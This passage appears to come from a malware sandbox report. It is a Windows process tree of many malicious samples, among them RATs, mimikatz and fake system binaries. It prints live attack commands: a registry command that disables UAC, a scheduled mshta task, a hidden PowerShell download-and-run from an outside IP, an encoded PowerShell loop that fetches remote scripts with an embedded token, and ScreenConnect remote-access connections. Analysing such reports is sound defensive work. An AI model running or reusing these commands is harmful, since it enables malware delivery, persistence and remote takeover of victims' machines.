        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:15120
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        Modifies registry key
        
        PID:14304
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:15144
- C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
  "C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
  2⤵
  PID:6948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn vBePumaIOX0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\s3E7H40q5.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    PID:8028
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn vBePumaIOX0 /tr "mshta C:\Users\Admin\AppData\Local\Temp\s3E7H40q5.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6944
- - C:\Windows\SysWOW64\mshta.exe
    mshta C:\Users\Admin\AppData\Local\Temp\s3E7H40q5.hta
    3⤵
    PID:8036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DD9JOGYMGAN9UAJH2JW4SI1UTHVR8M9D.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4408
- C:\Users\Admin\AppData\Local\Temp\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\putty.exe"
  2⤵
  PID:6848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D09E.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
    3⤵
    PID:6156
- C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
  2⤵
  PID:1600
- C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
  "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
  2⤵
  PID:6396
- C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
  "C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
  2⤵
  PID:4672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Installer.exe
1⤵
PID:4776
- C:\Users\Admin\AppData\Roaming\Installer.exe
  C:\Users\Admin\AppData\Roaming\Installer.exe
  2⤵
  PID:2060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\qEMFsTeRPC\cGEDpDSLzj.exe
1⤵
PID:3980
- C:\Users\Admin\AppData\Roaming\qEMFsTeRPC\cGEDpDSLzj.exe
  C:\Users\Admin\AppData\Roaming\qEMFsTeRPC\cGEDpDSLzj.exe
  2⤵
  PID:776
- - C:\Users\Admin\AppData\Roaming\qEMFsTeRPC\cGEDpDSLzj.exe
    "C:\Users\Admin\AppData\Roaming\qEMFsTeRPC\cGEDpDSLzj.exe"
    3⤵
    PID:3076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\svchost.exe
1⤵
PID:5644

C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
1⤵
PID:3788

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x328
1⤵
PID:3724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2796 -ip 2796
1⤵
PID:2936

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
1⤵
PID:5412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2620 -ip 2620
1⤵
PID:3284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:6228
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:8096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:6236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5228 -ip 5228
1⤵
PID:6288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4480 -s 964
1⤵
- Program crash
PID:6428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2992 -ip 2992
1⤵
PID:6528

C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
"C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
1⤵
PID:4780

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2992 -ip 2992
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 236
1⤵
- Program crash
PID:1548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\svchost.exe
1⤵
PID:6748
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  C:\Users\Admin\AppData\Local\Temp\svchost.exe
  2⤵
  PID:8132

C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
1⤵
PID:740
- C:\Users\Admin\AppData\Local\Temp\a\Filka.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Filka.exe"
  2⤵
  PID:7564
- - C:\Users\Admin\AppData\Roaming\Filka.exe
    "C:\Users\Admin\AppData\Roaming\Filka.exe"
    3⤵
    PID:5152
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:9200
- C:\Users\Admin\AppData\Local\Temp\a\bgbgggggggggg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bgbgggggggggg.exe"
  2⤵
  PID:524
- C:\Users\Admin\AppData\Local\Temp\a\bfffffdgsdgfsdvfsdfvrvsdfv.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bfffffdgsdgfsdvfsdfvrvsdfv.exe"
  2⤵
  PID:7412
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 268
    3⤵
    - Program crash
    PID:9088
- C:\Users\Admin\AppData\Local\Temp\a\ccccccccccccccssssssss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ccccccccccccccssssssss.exe"
  2⤵
  PID:9068
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 9068 -s 264
    3⤵
    - Program crash
    PID:11916
- C:\Users\Admin\AppData\Local\Temp\a\SQL.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SQL.exe"
  2⤵
  PID:5592
- C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe"
  2⤵
  PID:10000
- C:\Users\Admin\AppData\Local\Temp\a\threenew.exe
  "C:\Users\Admin\AppData\Local\Temp\a\threenew.exe"
  2⤵
  PID:13748
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:14192
  - - C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe"
      4⤵
      PID:14432
    - - C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe
        
        "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=37.221.64.46&p=8041&s=3bb46893-9f25-4c70-bcb4-07451b3ea3ea&k=BgIAAACkAABSU0ExAAgAAAEAAQBtRcOmkrgNYslRocOkTkuTyihOpi8jiGU066NYR9jBDXkHxmSQ2YVUm3s8%2fooJYnEhSV7fUNG1B5eE%2bEBaTsdMjuSy6wM5sWHiNov0I%2fCi2R8idtf7h0sRNyUXYU5mv3W%2f%2bAAUF5FVSqznlNh79hYpQ5ibv2AEsvG1v7zIzpVIe9GJKEaCyiMYnNwSkNrJyk7EHRdZqqtnkfYNP7V5qS%2f5EGwD4G1QOOnZh31YJbjAYbQ8GP%2b16XpkKKcCdOuQgGXJcCyDfk7uTR3jzS8ZKuveOcMCrYggcWYA0u%2bjDf3hxmbOoHDVTNrhlpt3R6xZaEcGEohbZJ69mglDgpaukS6e&r=&i=threenew" "1"
        5⤵
        
        PID:15180
  - - C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe
      "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.WindowsClient.exe"
      4⤵
      PID:15260
    - - C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe
        
        "C:\Users\Admin\AppData\Local\Apps\2.0\BNZMCMM8.35P\ZX4DNM1E.D4V\scre..tion_25b0fbb6ef7eb094_0017.0009_ed98c29f35f5d551\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=37.221.64.46&p=8041&s=55eaee0a-3347-421f-9eb9-edebabd8fc93&k=BgIAAACkAABSU0ExAAgAAAEAAQBtRcOmkrgNYslRocOkTkuTyihOpi8jiGU066NYR9jBDXkHxmSQ2YVUm3s8%2fooJYnEhSV7fUNG1B5eE%2bEBaTsdMjuSy6wM5sWHiNov0I%2fCi2R8idtf7h0sRNyUXYU5mv3W%2f%2bAAUF5FVSqznlNh79hYpQ5ibv2AEsvG1v7zIzpVIe9GJKEaCyiMYnNwSkNrJyk7EHRdZqqtnkfYNP7V5qS%2f5EGwD4G1QOOnZh31YJbjAYbQ8GP%2b16XpkKKcCdOuQgGXJcCyDfk7uTR3jzS8ZKuveOcMCrYggcWYA0u%2bjDf3hxmbOoHDVTNrhlpt3R6xZaEcGEohbZJ69mglDgpaukS6e&r=&i=thomas" "1"
        5⤵
        
        PID:10604
- C:\Users\Admin\AppData\Local\Temp\a\implant.exe
  "C:\Users\Admin\AppData\Local\Temp\a\implant.exe"
  2⤵
  PID:8692
- C:\Users\Admin\AppData\Local\Temp\a\tfqHNUJxJdFp8T0.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tfqHNUJxJdFp8T0.exe"
  2⤵
  PID:11436
- - C:\Users\Admin\AppData\Local\Temp\a\tfqHNUJxJdFp8T0.exe
    "C:\Users\Admin\AppData\Local\Temp\a\tfqHNUJxJdFp8T0.exe"
    3⤵
    PID:11996
- C:\Users\Admin\AppData\Local\Temp\a\avast.exe
  "C:\Users\Admin\AppData\Local\Temp\a\avast.exe"
  2⤵
  PID:11644
- - C:\Windows\Temp\asw.cf1e1a26f677f8a3\avast_free_antivirus_online_setup.exe
    "C:\Windows\Temp\asw.cf1e1a26f677f8a3\avast_free_antivirus_online_setup.exe" /cookie:mmm_ava_003_999_a9d_m:dlid_FAV-ONLINE-HP /ga_clientid:60a18b94-9ada-46d1-96df-9dd799ff7689 /edat_dir:C:\Windows\Temp\asw.cf1e1a26f677f8a3 /geo:GB
    3⤵
    PID:13004
- C:\Users\Admin\AppData\Local\Temp\a\Konsol.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Konsol.exe"
  2⤵
  PID:14828
- C:\Users\Admin\AppData\Local\Temp\a\HashDrop.exe
  "C:\Users\Admin\AppData\Local\Temp\a\HashDrop.exe"
  2⤵
  PID:15600
- C:\Users\Admin\AppData\Local\Temp\a\artikelv4%20%281%29.exe
  "C:\Users\Admin\AppData\Local\Temp\a\artikelv4%20%281%29.exe"
  2⤵
  PID:16928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Synaptics\Synaptics.exe
1⤵
PID:6976
- C:\ProgramData\Synaptics\Synaptics.exe
  C:\ProgramData\Synaptics\Synaptics.exe
  2⤵
  PID:8044
- - C:\Windows\SysWOW64\._cache_Synaptics.exe
    "C:\Windows\system32\._cache_Synaptics.exe"
    3⤵
    PID:11204
  - - C:\Windows\System32\a\Filka.exe
      "C:\Windows\System32\a\Filka.exe"
      4⤵
      PID:12516
    - - C:\Users\Admin\AppData\Roaming\Filka.exe
        
        "C:\Users\Admin\AppData\Roaming\Filka.exe"
        5⤵
        
        PID:13292
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:11948
  - - C:\Windows\System32\a\xdxedxdxd.exe
      "C:\Windows\System32\a\xdxedxdxd.exe"
      4⤵
      PID:13008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 13008 -s 260
        5⤵
        Program crash
        
        PID:9364
  - - C:\Windows\System32\a\manyyyyyyyyyyyyyyd.exe
      "C:\Windows\System32\a\manyyyyyyyyyyyyyyd.exe"
      4⤵
      PID:13156
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 13156 -s 260
        5⤵
        Program crash
        
        PID:11520
  - - C:\Windows\System32\a\bgbgggggggggg.exe
      "C:\Windows\System32\a\bgbgggggggggg.exe"
      4⤵
      PID:11304
  - - C:\Windows\System32\a\filee.exe
      "C:\Windows\System32\a\filee.exe"
      4⤵
      PID:12664
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12664 -s 260
        5⤵
        Program crash
        
        PID:11364
  - - C:\Windows\System32\a\bfffffdgsdgfsdvfsdfvrvsdfv.exe
      "C:\Windows\System32\a\bfffffdgsdgfsdvfsdfvrvsdfv.exe"
      4⤵
      PID:14060
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14060 -s 260
        5⤵
        Program crash
        
        PID:8544
  - - C:\Windows\System32\a\altttttt.exe
      "C:\Windows\System32\a\altttttt.exe"
      4⤵
      PID:9644
  - - C:\Windows\System32\a\ccccccccccccccssssssss.exe
      "C:\Windows\System32\a\ccccccccccccccssssssss.exe"
      4⤵
      PID:10588
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10588 -s 260
        5⤵
        Program crash
        
        PID:11904
  - - C:\Windows\System32\a\xsxsxscsc.exe
      "C:\Windows\System32\a\xsxsxscsc.exe"
      4⤵
      PID:12028
  - - C:\Windows\System32\a\SQL.exe
      "C:\Windows\System32\a\SQL.exe"
      4⤵
      PID:13764
  - - C:\Windows\System32\a\raw_cbot.exe
      "C:\Windows\System32\a\raw_cbot.exe"
      4⤵
      PID:14328
  - - C:\Windows\System32\a\mimikatz.exe
      "C:\Windows\System32\a\mimikatz.exe"
      4⤵
      PID:6872
  - - C:\Windows\System32\a\crypted.exe
      "C:\Windows\System32\a\crypted.exe"
      4⤵
      PID:9192
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:5896
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:11112
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        
        PID:13216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff83376dcf8,0x7ff83376dd04,0x7ff83376dd10
        7⤵
        
        PID:16956
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        
        PID:11148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff83376dcf8,0x7ff83376dd04,0x7ff83376dd10
        7⤵
        
        PID:10056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --exception-pointers=106205952114688 --process=168 /prefetch:7 --thread=2940
        8⤵
        
        PID:11912
  - - C:\Windows\System32\a\fileless.exe
      "C:\Windows\System32\a\fileless.exe"
      4⤵
      PID:12644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -NoExit -encoded dwBoAGkAbABlACAAKAAnAFQAcgB1AGUAJwApACAAewB0AHIAeQAgAHsASQBFAFgAKABJAFcAUgAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBJAHMAZABhAE0AMQAyADMANAA1ADYALwBzAGUAYwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQBuAHQAcgB5ACcAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAgAD0AIAAnAHQAbwBrAGUAbgAgAGcAaABwAF8AegBXAHMAZAA0AEMAMgBTADQAWABaAGwAbQBXAGEAMwBWAHUANgBUAGMATwBjAHkAQgBEAFAAeQBjAHAAMwBGAEkAMwBWADcAJwB9ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAAgADsAIABJAEUAWAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAEkAcwBkAGEATQAxADIAMwA0ADUANgAvAHMAZQBjAC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBsAG8AYwBhAGwAYQBkAGQAcgBlAHMAcwAnACAALQBIAGUAYQBkAGUAcgBzACAAQAB7AEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIAA9ACAAJwB0AG8AawBlAG4AIABnAGgAcABfAHoAVwBzAGQANABDADIAUwA0AFgAWgBsAG0AVwBhADMAVgB1ADYAVABjAE8AYwB5AEIARABQAHkAYwBwADMARgBJADMAVgA3ACcAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAfQAgAGMAYQB0AGMAaAAgAHsAfQAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADUAIAB9AA==
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11896
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -NoExit -encoded dwBoAGkAbABlACAAKAAnAFQAcgB1AGUAJwApACAAewB0AHIAeQAgAHsASQBFAFgAKABJAFcAUgAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBJAHMAZABhAE0AMQAyADMANAA1ADYALwBzAGUAYwAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAaQBuAC8AZQBuAHQAcgB5ACcAIAAtAEgAZQBhAGQAZQByAHMAIABAAHsAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAgAD0AIAAnAHQAbwBrAGUAbgAgAGcAaABwAF8AegBXAHMAZAA0AEMAMgBTADQAWABaAGwAbQBXAGEAMwBWAHUANgBUAGMATwBjAHkAQgBEAFAAeQBjAHAAMwBGAEkAMwBWADcAJwB9ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAAgADsAIABJAEUAWAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAEkAcwBkAGEATQAxADIAMwA0ADUANgAvAHMAZQBjAC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBsAG8AYwBhAGwAYQBkAGQAcgBlAHMAcwAnACAALQBIAGUAYQBkAGUAcgBzACAAQAB7AEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIAA9ACAAJwB0AG8AawBlAG4AIABnAGgAcABfAHoAVwBzAGQANABDADIAUwA0AFgAWgBsAG0AVwBhADMAVgB1ADYAVABjAE8AYwB5AEIARABQAHkAYwBwADMARgBJADMAVgA3ACcAfQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAfQAgAGMAYQB0AGMAaAAgAHsAfQAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADUAIAB9AA==
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11848
  - - C:\Windows\System32\a\meter.exe
      "C:\Windows\System32\a\meter.exe"
      4⤵
      PID:12052
  - - C:\Windows\System32\a\csl.exe
      "C:\Windows\System32\a\csl.exe"
      4⤵
      PID:13712
  - - C:\Windows\System32\a\PsExec.exe
      "C:\Windows\System32\a\PsExec.exe"
      4⤵
      PID:10516
  - - C:\Windows\System32\a\Quas13k.exe
      "C:\Windows\System32\a\Quas13k.exe"
      4⤵
      PID:14804
  - - C:\Windows\System32\a\c2new.exe
      "C:\Windows\System32\a\c2new.exe"
      4⤵
      PID:7052
  - - C:\Windows\System32\a\taskhostw.exe
      "C:\Windows\System32\a\taskhostw.exe"
      4⤵
      PID:14624
  - - C:\Windows\System32\a\wnsc.exe
      "C:\Windows\System32\a\wnsc.exe"
      4⤵
      PID:15040
  - - C:\Windows\System32\a\csrss.exe
      "C:\Windows\System32\a\csrss.exe"
      4⤵
      PID:7728
  - - C:\Windows\System32\a\M7XQmz2DgtiyE3f.exe
      "C:\Windows\System32\a\M7XQmz2DgtiyE3f.exe"
      4⤵
      PID:6996
  - - C:\Windows\System32\a\threenew.exe
      "C:\Windows\System32\a\threenew.exe"
      4⤵
      PID:8608
  - - C:\Windows\System32\a\thunderbird.exe
      "C:\Windows\System32\a\thunderbird.exe"
      4⤵
      PID:14468
    - - C:\Windows\System32\a\thunderbird.exe
        
        "C:\Windows\System32\a\thunderbird.exe"
        5⤵
        
        PID:4760
  - - C:\Windows\System32\a\implant.exe
      "C:\Windows\System32\a\implant.exe"
      4⤵
      PID:11888
  - - C:\Windows\System32\a\hp.exe
      "C:\Windows\System32\a\hp.exe"
      4⤵
      PID:17156
  - - C:\Windows\System32\a\pivo.exe
      "C:\Windows\System32\a\pivo.exe"
      4⤵
      PID:11868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Windows\SysWOW64\Userdata\Userdata.exe"
1⤵
PID:3960
- C:\Windows\SysWOW64\Userdata\Userdata.exe
  C:\Windows\SysWOW64\Userdata\Userdata.exe
  2⤵
  PID:8108
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:8440
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:10312
- - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    3⤵
    PID:8488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\0a-PORNOSKI.exe
1⤵
PID:6036
- C:\Users\Admin\dane\0a-PORNOSKI.exe
  C:\Users\Admin\dane\0a-PORNOSKI.exe
  2⤵
  PID:8060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\dane\smss.exe
1⤵
PID:6340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2992 -ip 2992
1⤵
PID:524

C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
1⤵
PID:6148
- C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
  2⤵
  PID:5812
- - C:\Users\Admin\AppData\Local\Temp\a\xdxedxdxd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xdxedxdxd.exe"
    3⤵
    PID:6736
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6736 -s 264
      4⤵
      Program crash
      PID:8188
- - C:\Users\Admin\AppData\Local\Temp\a\manyyyyyyyyyyyyyyd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\manyyyyyyyyyyyyyyd.exe"
    3⤵
    PID:7332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 268
      4⤵
      Program crash
      PID:7280
- - C:\Users\Admin\AppData\Local\Temp\a\filee.exe
    "C:\Users\Admin\AppData\Local\Temp\a\filee.exe"
    3⤵
    PID:7824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7824 -s 264
      4⤵
      Program crash
      PID:8344
- - C:\Users\Admin\AppData\Local\Temp\a\altttttt.exe
    "C:\Users\Admin\AppData\Local\Temp\a\altttttt.exe"
    3⤵
    PID:8744
- - C:\Users\Admin\AppData\Local\Temp\a\xsxsxscsc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\xsxsxscsc.exe"
    3⤵
    PID:8788
- - C:\Users\Admin\AppData\Local\Temp\a\raw_cbot.exe
